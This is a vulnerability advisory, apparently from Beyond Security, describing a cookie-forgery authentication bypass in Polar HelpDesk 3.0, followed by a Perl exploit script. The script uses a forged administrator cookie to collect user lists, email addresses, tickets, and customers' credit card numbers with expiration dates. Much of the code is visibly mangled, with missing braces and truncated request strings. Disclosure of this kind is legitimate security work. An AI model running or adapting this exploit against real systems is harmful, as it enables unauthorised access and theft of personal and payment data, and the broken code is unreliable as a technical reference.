*Polar HelpDesk Inadequate Security Checks*
Polar HelpDesk is "a software solution
for implementation of a help desk support system on your web site". We
found the product to inadequately verify whether the user logged on to
the system (provided username and password) or the privileges that the
user has (Admin, Regular).
*Vulnerable Systems:*
* Polar HelpDesk version 3.0
The above happen due to the fact that Polar's HelpDesk only verifies
whether the user has the appropriate cookie, and the cookie's value
without verifying whether the user has even logged on into the system.
Example, by sending the server the following cookie:
/HelpDesk_User=UserType=6&UserID=1/, the user forces the server to do
two things, first log on the user as UserID 1, the second to regard the
user as a type 6 user (Administrative). From this point the client can
practically administrate the server's complete functionality. Add users,
view tickets, modify tickets, grab credit card numbers (if those are
available), etc.
*Vendor response:*
/Thank you for your report. We are already aware of that security
problem and we already have a plan to fix it. The release is set for
first days in next week./
We have never received a response telling us which version addresses the
above issues, but we assume the current version is immune.
*Testing Methodology:*
A few months ago Beyond Security built a new module for its Automated
Scanning Vulnerability Assessment engine to test web sites and web
applications for security vulnerabilities. This module adds the
capability to dynamically crawl through a web site and find
vulnerabilities in its dynamic pages.
This type of tool was considered to be different from the network VA
tools, but we at Beyond Security believe that these two types of tools
should be merged into one, and this is what made us incorporate the Web
Site Security Audit module to our Automated Scanning engine.
For a press release on this integration see:
White paper on the first integrated network and web application
vulnerability scanner: http://www.beyondsecurity.com/webscan-wp.pdf
Our Automated Scanning engine equipped with the Web Site Security Audit
module did all the tests described in this advisory automatically.
# Beyond Security Ltd.
# The below sample will do:
# 1) Grab a user list
# 2) Grab each user's email
# 3) List all available Inbox tickets
# 4) List all tickets with charge on them, and the credit card number
and their expiration date
use IO::Socket;
use strict;
my $host = $ARGV[0];
my $base_path = $ARGV[1];
my $remote = IO::Socket::INET->new ( Proto => "tcp",
PeerAddr => $host,
PeerPort => "80"
unless ($remote) { die "cannot connect to http daemon on $host" }
print "connected\n";
my $content = "txtPassword=admin&txtEmail=admin\@admin&Submit=Log+in";
my $length = length($content);
my $base_path = $ARGV[1];
print "Get user list\n";
my $data_get_userlist = "GET /$base_path/user/modifyprofiles.asp HTTP/1.1\r\
Host: $host\r\
User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.6)
Gecko/20040405 Firefox/0.8\r\
Connection: close\r\
Cookie: HelpDesk_User=UserType=6&UserID=1;\r\
print $remote $data_get_userlist;
# print $data_get_userlist;
my @names;
while (<$remote>)
if (/
Results /)
while (/([^<]+)<\/a>/g)
my $Item;
$Item->{ID} = $1;
$Item->{Name} = $2;
print "ID: ".$Item->{ID}." Name: ".$Item->{Name}."\n";
push @names, $Item;
close $remote;
print "Get users' email\n";
my $data_get_userdata = "";
foreach my $name (@names)
$remote = IO::Socket::INET->new ( Proto => "tcp", PeerAddr => $host,
PeerPort => "80" );
unless ($remote) { die "cannot connect to http daemon on $host" }
$data_get_userdata = "GET
/$base_path/user/profileinfo.asp?ID=".$name->{ID}." HTTP/1.1\r\
Host: $host\r\
User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.6)
Gecko/20040405 Firefox/0.8\r\
Connection: close\r\
Cookie: HelpDesk_User=UserType=6&UserID=1;\r\
print $remote $data_get_userdata;
# print $data_get_userdata;
while (<$remote>)
if (/name="txtEmail" value="/)
/name="txtEmail" value="([^"]+)"/;
print "ID: ".$name->{ID}.", Email: $1\n";
print "Get Inbox tickets\n";
my $data_get_inboxtickets = "GET
/$base_path/ticketsupport/Tickets.asp?ID=4 HTTP/1.1\r\
Host: $host\r\
User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.6)
Gecko/20040405 Firefox/0.8\r\
Connection: close\r\
Cookie: HelpDesk_User=UserType=6&UserID=1;\r\
$remote = IO::Socket::INET->new ( Proto => "tcp", PeerAddr => $host,
PeerPort => "80" );
unless ($remote) { die "cannot connect to http daemon on $host" }
print $remote $data_get_inboxtickets;
#print $data_get_inboxtickets;
while (<$remote>)
if (/Ticket #/)
# print $_;
while (/new ( Proto => "tcp", PeerAddr => $host,
PeerPort => "80" );
unless ($remote) { die "cannot connect to http daemon on $host" }
print $remote $data_get_billing;
my @tickets;
while (<$remote>)
if (/Ticket No./)
my $Item;
$Item->{ID} = $1;
$Item->{Name} = $2;
print "Ticket ID: ".$Item->{ID}.", Name: ".$Item->{Name}."\n";
push @tickets, $Item;
foreach my $ticket (@tickets)
my $data_get_billingcreditcard = "GET
Host: $host\r\
User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.6)
Gecko/20040405 Firefox/0.8\r\
Connection: close\r\
Cookie: HelpDesk_User=UserType=6&UserID=1;\r\
$remote = IO::Socket::INET->new ( Proto => "tcp", PeerAddr => $host,
PeerPort => "80" );
unless ($remote) { die "cannot connect to http daemon on $host" }
print $remote $data_get_billingcreditcard;
my $Count = 0;
my $Print = 0;
while (<$remote>)
if ($Print)
$Count ++;
if ($Count > 1)
/ | ]+>([^<]+)<\/td>/;
print $1, "\n";
$Print = 0;
if (/Expiration date /)
print "Expiration date: ";
$Count = 0;
$Print = 1;
if (/Credit Card /)
print "Credit Card: ";
$Count = 0;
$Print = 1;
*Additional information*
The information has been provided by Noam Rathaus